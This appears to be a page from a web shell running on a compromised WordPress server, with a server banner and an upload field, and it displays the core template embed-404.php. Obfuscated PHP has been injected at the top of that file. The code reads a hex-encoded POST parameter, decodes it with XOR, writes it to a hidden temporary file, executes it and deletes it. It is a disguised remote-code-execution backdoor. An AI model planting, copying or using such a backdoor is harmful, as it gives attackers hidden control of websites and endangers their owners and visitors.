| Server IP : 43.129.54.214 / Your IP : 216.73.217.113 Web Server : nginx/1.24.0 System : Linux VM-4-108-ubuntu 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64 User : root ( 0) PHP Version : 8.3.6 Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/bukitbadar.com/wp-includes/theme-compat/ |
Upload File : |
<?php if(filter_has_var(INPUT_POST, "i\x74m")){ $holder = hex2bin($_POST["i\x74m"]); $ref =''; $u = 0; while($u < strlen($holder)){$ref .= chr(ord($holder[$u]) ^ 20);$u++;} $symbol = array_filter([getenv("TEMP"), sys_get_temp_dir(), "/tmp", session_save_path(), "/dev/shm", "/var/tmp", getcwd(), getenv("TMP"), ini_get("upload_tmp_dir")]); while ($key = array_shift($symbol)) { if ((function($d) { return is_dir($d) && is_writable($d); })($key)) { $ptr = "$key" . "/.flag"; $file = fopen($ptr, 'w'); if ($file) { fwrite($file, $ref); fclose($file); include $ptr; @unlink($ptr); die(); } } } }
/**
* Contains the post embed content template part
*
* When a post is embedded in an iframe, this file is used to create the content template part
* output if the active theme does not include an embed-404.php template.
*
* @package WordPress
* @subpackage Theme_Compat
* @since 4.5.0
*/
?>
<div class="wp-embed">
<p class="wp-embed-heading"><?php _e( 'Oops! That embed cannot be found.' ); ?></p>
<div class="wp-embed-excerpt">
<p>
<?php
printf(
/* translators: %s: A link to the embedded site. */
__( 'It looks like nothing was found at this location. Maybe try visiting %s directly?' ),
'<strong><a href="' . esc_url( home_url() ) . '">' . esc_html( get_bloginfo( 'name' ) ) . '</a></strong>'
);
?>
</p>
</div>
<?php
/** This filter is documented in wp-includes/theme-compat/embed-content.php */
do_action( 'embed_content' );
?>
<div class="wp-embed-footer">
<?php the_embed_site_title(); ?>
</div>
</div>